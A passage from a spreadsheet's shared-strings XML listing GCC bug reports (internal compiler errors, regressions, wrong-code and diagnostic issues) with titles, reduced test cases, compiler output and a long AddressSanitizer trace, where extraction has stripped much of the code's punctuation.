reduced testcase (from gcc.c-torture/execute/20100416-1.c)
Output:
$ gcc -O -fgraphite-identity pr46758.c
$ ./a.out 
Aborted
Tested revisions:
r167331 - fail
r153685 - fail
4.5 r166509 - fail
4.4 r166509 - OK</t>
  </si>
  <si>
    <t>GCC-49688</t>
  </si>
  <si>
    <t>[alpha]: Many execution test failures</t>
  </si>
  <si>
    <t>Recent contributions between 4.7.0 20110702 (experimental) [trunk revision 175781] and 4.7.0 20110708 (experimental) [trunk revision 176030] severely regressed many execution tests in the testsuite.
[1] http://gcc.gnu.org/ml/gcc-testresults/2011-07/msg00261.html
[2] http://gcc.gnu.org/ml/gcc-testresults/2011-07/msg00989.html
Authors of suspected commits (probably dwarf2 rewrite since exceptions are not working at all) added to CC.</t>
  </si>
  <si>
    <t>GCC-59832</t>
  </si>
  <si>
    <t>[c++11] ICE in reshape_init_class with initializer list</t>
  </si>
  <si>
    <t>Google ref b/12545403
/// -- cut ---
struct A
{
  struct B
  {
    int aa
    int bb
  }
  B cc
}
void Fn1 (const A 
void
Fn2 ()
{
  Fn1 ( { { bb: 0 } })
}
/// -- cut ---
Using trunk:
g++ (GCC) 4.9.0 20140110 (experimental)
g++ -c -g -std=c++11 t.ii
t.ii: In function â€˜void Fn2()â€™:
t.ii:16:22: internal compiler error: in reshape_init_class at cp/decl.c:5267
   Fn1 ( { { bb: 0 } })
                      ^
0x56de5d reshape_init_class
        ../../gcc/cp/decl.c:5267
0x56de5d reshape_init_r
        ../../gcc/cp/decl.c:5493
0x56d026 reshape_init(tree_node* tree_node* int)
        ../../gcc/cp/decl.c:5537
0x55364f build_aggr_conv
        ../../gcc/cp/call.c:885
0x55364f implicit_conversion
        ../../gcc/cp/call.c:1757
0x5587d6 can_convert_arg(tree_node* tree_node* tree_node* int int)
        ../../gcc/cp/call.c:8948
0x5536e5 build_aggr_conv
        ../../gcc/cp/call.c:910
0x5536e5 implicit_conversion
        ../../gcc/cp/call.c:1757
0x554041 reference_binding
        ../../gcc/cp/call.c:1464
0x552e5c implicit_conversion
        ../../gcc/cp/call.c:1698
0x555112 add_function_candidate
        ../../gcc/cp/call.c:2002
0x551836 add_candidates
        ../../gcc/cp/call.c:5094
0x558b82 perform_overload_resolution
        ../../gcc/cp/call.c:3819
0x55f68a build_new_function_call(tree_node* vec** bool int)
        ../../gcc/cp/call.c:3896
0x6d9711 finish_call_expr(tree_node* vec** bool bool int)
        ../../gcc/cp/semantics.c:2281
0x65c73e cp_parser_postfix_expression
        ../../gcc/cp/parser.c:6171
0x65f418 cp_parser_unary_expression
        ../../gcc/cp/parser.c:7177
0x6600af cp_parser_binary_expression
        ../../gcc/cp/parser.c:7881
0x6605a1 cp_parser_assignment_expression
        ../../gcc/cp/parser.c:8119
0x662534 cp_parser_expression
        ../../gcc/cp/parser.c:8281
Please submit a full bug report
Without -std=c++11 same crash after warning:
g++ -c -g  t.ii
t.ii: In function â€˜void Fn2()â€™:
t.ii:16:7: warning: extended initializer lists only available with -std=c++11 or -std=gnu++11 [enabled by default]
   Fn1 ( { { bb: 0 } })
       ^
t.ii:16:22: warning: extended initializer lists only available with -std=c++11 or -std=gnu++11 [enabled by default]
   Fn1 ( { { bb: 0 } })
                      ^
t.ii:16:22: internal compiler error: in reshape_init_class at cp/decl.c:5267
0x56de5d reshape_init_class
        ../../gcc/cp/decl.c:5267
...</t>
  </si>
  <si>
    <t>ppluzhnikov</t>
  </si>
  <si>
    <t>GCC-9680</t>
  </si>
  <si>
    <t>[powerpc64] ICE for unrecog insn with vector_size attr</t>
  </si>
  <si>
    <t>gcc.c-torture/compile/simd-5.c fails with an ICE for an
unrecognized instruction with mainline 3.3-branch and
3-2.branch for powerpc64-linux either a cross compiler or
a native 64-bit compiler.  Compiler output:
simd-5.c: In function `main':
simd-5.c:12: error: unrecognizable insn:
(insn 68 67 33 0 (nil) (set (subreg:DI (reg:V2SI 9 r9) 0)
        (subreg:DI (mem:V2SI (plus:DI (reg/f:DI 31 r31)
                    (const_int 136 [0x88])) [0 S8 A8]) 0)) -1 (nil)
    (nil))
simd-5.c:12: internal compiler error: in extract_insn at recog.c:2175
Please submit a full bug report
Full text of the test case:
#define vector64 __attribute__((vector_size(8)))
main(){
vector64 int  c
vector64 int a = {1 -1}
vector64 int b = {2 -2}
c = -a + b*b*(-1LL)
/* c is now {5 3} */
 printf(result is %llx\n (long long)c)
}
Release:
3.3 20030210 (prerelease)
Environment:
powerpc64-linux SUSE SLES8</t>
  </si>
  <si>
    <t>GCC-27739</t>
  </si>
  <si>
    <t>expected primary-expression before double error caused by simple varaible name</t>
  </si>
  <si>
    <t>Hello
    I have tried to compile the following simple code using g++ version 3.4.4.
int main(int argc char *argv[])
{
	double or
	return 1
}
The compiler returns the following errors:
main.cpp: In function `int main(int char**)':
main.cpp:3: error: expected primary-expression before double
main.cpp:3: error: expected `' before double
make: *** [dummy] Error 1
Renaming the variable something other than 'or' fixes the error. Nevertheless the error message isn't particularly clear!
Many thanks</t>
  </si>
  <si>
    <t>GCC-55745</t>
  </si>
  <si>
    <t>[4.8 regression] FAIL: gfortran.dg/pr26246_2.f90  -O   scan-tree-dump-times original static int 0</t>
  </si>
  <si>
    <t>Since r194604:
$ grep 'static int' pr26246_2.f90.003t.original 
  static integer(kind=4) _F.string</t>
  </si>
  <si>
    <t>GCC-18681</t>
  </si>
  <si>
    <t>[4.0/4.1/4.2 Regression] [DR 45] template friend declaration not recognized</t>
  </si>
  <si>
    <t>Dear all
I would like to post a fault report for the GNU C/C++ compiler 3.3-e500.
We use the compiler to generate code for a PowerPC processor.
Used invokation line for the GNU C++ compiler:
ccppc -c -x c++ -ansi -Wall -Werror -mcpu=8540 -fverbose-asm -mbig
      -fmerge-templates -mmultiple -mno-string -mstrict-align -O3
      -fno-exceptions -fno-rtti -fno-builtin-printf
      -I
      -D
      K.CPP -oK.O
// example program
template  class C1
template  class C2
template 
class C2
{
    typedef T_* T_PAR_TYPE        &lt;---- k.CPP line 7
    friend class C1           is a friend
}
template 
class C1
{
//public:                          &lt;---- k.CPP line 14
    typedef typename C2::T_PAR_TYPE T_PAR
    struct S1
    {
        T_PAR par                 &lt;---- k.CPP line 18
    }
    static void fx (S1
public:
    void f (T_PAR ptr)
}
template 
void C1::f (T_PAR ptr_)
{
    S1 s1                         &lt;---- k.CPP line 31
    fx (s1)
}
typedef int T_MEM[20]
void f (T_MEM* p1)
{
    C1 c1
    c1.f (p1)                     &lt;---- k.CPP line 45
}
The compiler gives the following error messages:
k.CPP: In instantiation of `C1::S1':
k.CPP:31:   instantiated from `void C1 &gt;::f
(typename C2 &gt;::T_PAR_TYPE) [with T_ = int 
(*)[20]]'
k.CPP:45:   instantiated from here
k.CPP:7: error: `typedef int (*C2::T_PAR_TYPE)[20]' is private
k.CPP:18: error: within this context
The error messages remain the same if line 14 is un-commented. This seems OK
since the access specification of C1::T_PAR should not affect C1::S1. The
compiler translates only without complaints if C2::T_PAR_TYPE is made public.
With kind regards
W. Roehrl</t>
  </si>
  <si>
    <t>GCC-25045</t>
  </si>
  <si>
    <t>[4.1 only] DIM argument of PRODUCT is not optional</t>
  </si>
  <si>
    <t>using GNU Fortran 95 (GCC) 4.1.0 20051126 (prerelease)  with '-g -pedantic -std=f95' I get a bad / no diagnostic for the following invalid code:
END
SUBROUTINE S1(N)
  INTEGER OPTIONAL :: N
  INTEGER  :: A(3)
  write(6*) PRODUCT(AN)
END SUBROUTINE</t>
  </si>
  <si>
    <t>GCC-12989</t>
  </si>
  <si>
    <t>[3.4 Regression][new parser] internal compiler error: tree check: expected field_decl</t>
  </si>
  <si>
    <t>GCC version had been updated from CVS about 3-4 hours ago
----------------------------------
g++ -c test.c -o test.o
test.c:4: error: ISO C++ forbids declaration of `Hash' with no type
test.c: In member function `virtual int Hash1::_sizeof() const':
test.c:3: error: expected `)'
test.c:3: internal compiler error: tree check: expected field_decl have
baselink in cxx_sizeof_or_alignof_expr at cp/typeck.c:1236
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
test.c:
----------------------------------------
class Hash1
{
  virtual int _sizeof (void) const { return sizeof (Hash const) }
  Hash ()
}
----------------------------------------</t>
  </si>
  <si>
    <t>msk</t>
  </si>
  <si>
    <t>GCC-36793</t>
  </si>
  <si>
    <t>x86-64 does not get __sync_synchronize right</t>
  </si>
  <si>
    <t>As I understand __sync_synchronize the intent is to emit a memory barrier instruction at least on multiprocessor systems.  Currently on x86 __sync_synchronize inhibits explicit code motion across the builtin function call but not processor reordering of memory operations across the builtin function call.
I think mfence is the right instruction on x86-64 and this or a similar pattern should be added to sync.md:
(define_insn memory_barrier
  [(unspec_volatile [(const_int 0)] UNSPEC_MFENCE)]
  TARGET_SSE2
  mfence)</t>
  </si>
  <si>
    <t>jfc</t>
  </si>
  <si>
    <t>GCC-55938</t>
  </si>
  <si>
    <t>g++.dg/asan/deep-stack-uaf-1.C fails at r195092 on darwin</t>
  </si>
  <si>
    <t>After the commit of r195092 x86_64-apple-darwin12 exhibits new failures. These are of the form...
FAIL: g++.dg/asan/deep-stack-uaf-1.C  -O0  output pattern test is =================================================================
==47472== ERROR: AddressSanitizer: alloc-dealloc-mismatch (operator new [] vs free) on 0x00010bb0ae00
    #0 0x108cb6cc5 (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/x86_64-apple-darwin12.2.0/./libsanitizer/asan/.libs/libasan.0.dylib+0x8cc5)
    #1 0x108cb6e4a (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/x86_64-apple-darwin12.2.0/./libsanitizer/asan/.libs/libasan.0.dylib+0x8e4a)
    #2 0x108c9da27 (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x100000a27)
    #3 0x108c9ee77 (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x100001e77)
    #4 0x108c9ee5d (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x100001e5d)
    #5 0x108c9ee43 (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x100001e43)
    #6 0x108c9ee29 (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x100001e29)
    #7 0x108c9ee0f (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x100001e0f)
    #8 0x108c9edf5 (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x100001df5)
    #9 0x108c9eddb (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x100001ddb)
    #10 0x108c9edc1 (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x100001dc1)
    #11 0x108c9eda7 (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x100001da7)
    #12 0x108c9ed8d (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x100001d8d)
    #13 0x108c9ed73 (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x100001d73)
    #14 0x108c9ed59 (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x100001d59)
    #15 0x108c9ed3f (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x100001d3f)
    #16 0x108c9ed25 (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x100001d25)
    #17 0x108c9ed0b (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x100001d0b)
    #18 0x108c9ecf1 (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x100001cf1)
    #19 0x108c9ecd7 (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x100001cd7)
    #20 0x108c9ecbd (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x100001cbd)
    #21 0x108c9eca3 (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x100001ca3)
    #22 0x108c9ec89 (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x100001c89)
    #23 0x108c9ec6f (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x100001c6f)
    #24 0x108c9ec55 (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x100001c55)
    #25 0x108c9ec3b (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x100001c3b)
    #26 0x108c9ec21 (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x100001c21)
    #27 0x108c9ec07 (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x100001c07)
    #28 0x108c9ebed (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x100001bed)
    #29 0x108c9ebd3 (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x100001bd3)
    #30 0x108c9ebb9 (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x100001bb9)
    #31 0x108c9eb9f (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x100001b9f)
    #32 0x108c9eb85 (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x100001b85)
    #33 0x108c9eb6b (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x100001b6b)
    #34 0x108c9eb51 (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x100001b51)
    #35 0x108c9eb37 (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x100001b37)
    #36 0x108c9eb1d (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x100001b1d)
    #37 0x108c9eb03 (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x100001b03)
    #38 0x108c9eae9 (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x100001ae9)
    #39 0x108c9eacf (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x100001acf)
    #40 0x108c9eab5 (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x100001ab5)
    #41 0x108c9ea9b (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x100001a9b)
    #42 0x108c9ea81 (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x100001a81)
    #43 0x108c9ea67 (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x100001a67)
    #44 0x108c9ea4d (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x100001a4d)
    #45 0x108c9ea33 (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x100001a33)
    #46 0x108c9ea19 (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x100001a19)
    #47 0x108c9e9ff (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x1000019ff)
    #48 0x108c9e9e5 (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x1000019e5)
    #49 0x108c9e9cb (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x1000019cb)
    #50 0x108c9e9b1 (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x1000019b1)
    #51 0x108c9e997 (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x100001997)
    #52 0x108c9e97d (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x10000197d)
    #53 0x108c9e963 (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x100001963)
    #54 0x108c9e949 (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x100001949)
    #55 0x108c9e92f (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x10000192f)
    #56 0x108c9e915 (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x100001915)
    #57 0x108c9e8fb (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x1000018fb)
    #58 0x108c9e8e1 (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x1000018e1)
    #59 0x108c9e8c7 (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x1000018c7)
    #60 0x108c9e8ad (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x1000018ad)
    #61 0x108c9e893 (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x100001893)
    #62 0x108c9e879 (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x100001879)
    #63 0x108c9e85f (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x10000185f)
    #64 0x108c9e845 (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x100001845)
    #65 0x108c9e82b (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x10000182b)
    #66 0x108c9e811 (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x100001811)
    #67 0x108c9e7f7 (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x1000017f7)
    #68 0x108c9e7dd (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x1000017dd)
    #69 0x108c9e7c3 (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x1000017c3)
    #70 0x108c9e7a9 (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x1000017a9)
    #71 0x108c9e78f (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x10000178f)
    #72 0x108c9e775 (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x100001775)
    #73 0x108c9e75b (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x10000175b)
    #74 0x108c9e741 (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x100001741)
    #75 0x108c9e727 (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x100001727)
    #76 0x108c9e70d (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x10000170d)
    #77 0x108c9e6f3 (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x1000016f3)
    #78 0x108c9e6d9 (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x1000016d9)
    #79 0x108c9e6bf (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x1000016bf)
    #80 0x108c9e6a5 (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x1000016a5)
    #81 0x108c9e68b (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x10000168b)
    #82 0x108c9e671 (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x100001671)
    #83 0x108c9e657 (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x100001657)
    #84 0x108c9e63d (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x10000163d)
    #85 0x108c9e623 (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x100001623)
    #86 0x108c9e609 (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x100001609)
    #87 0x108c9e5ef (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x1000015ef)
    #88 0x108c9e5d5 (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x1000015d5)
    #89 0x108c9e5bb (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x1000015bb)
    #90 0x108c9e5a1 (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x1000015a1)
    #91 0x108c9e587 (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x100001587)
    #92 0x108c9e56d (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x10000156d)
    #93 0x108c9e553 (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x100001553)
    #94 0x108c9e539 (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x100001539)
    #95 0x108c9e51f (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x10000151f)
    #96 0x108c9e505 (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x100001505)
    #97 0x108c9e4eb (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x1000014eb)
    #98 0x108c9e4d1 (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x1000014d1)
    #99 0x108c9e4b7 (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x1000014b7)
    #100 0x108c9e49d (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x10000149d)
    #101 0x108c9e483 (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x100001483)
    #102 0x108c9e469 (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x100001469)
    #103 0x108c9e44f (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x10000144f)
    #104 0x108c9e435 (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x100001435)
    #105 0x108c9e41b (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x10000141b)
    #106 0x108c9e401 (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x100001401)
    #107 0x108c9e3e7 (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x1000013e7)
    #108 0x108c9e3cd (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x1000013cd)
    #109 0x108c9e3b3 (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x1000013b3)
    #110 0x108c9e399 (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x100001399)
    #111 0x108c9e37f (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x10000137f)
    #112 0x108c9e365 (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x100001365)
    #113 0x108c9e34b (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x10000134b)
    #114 0x108c9e331 (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x100001331)
    #115 0x108c9e317 (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x100001317)
    #116 0x108c9e2fd (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x1000012fd)
    #117 0x108c9e2e3 (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x1000012e3)
    #118 0x108c9e2c9 (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x1000012c9)
    #119 0x108c9e2af (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x1000012af)
0x00010bb0ae00 is located 0 bytes inside of 10-byte region [0x00010bb0ae000x00010bb0ae0a)
allocated by thread T0 here:
    #0 0x108cb723a (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/x86_64-apple-darwin12.2.0/./libsanitizer/asan/.libs/libasan.0.dylib+0x923a)
    #1 0x108c9d9aa (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/g++/./deep-stack-uaf-1.exe+0x1000009aa)
    #2 0x7fff847cb7e0 (/usr/lib/system/libdyld.dylib+0x27e0)
    #3 0x0
==47472== HINT: if you don't care about these warnings you may set ASAN_OPTIONS=alloc_dealloc_mismatch=0
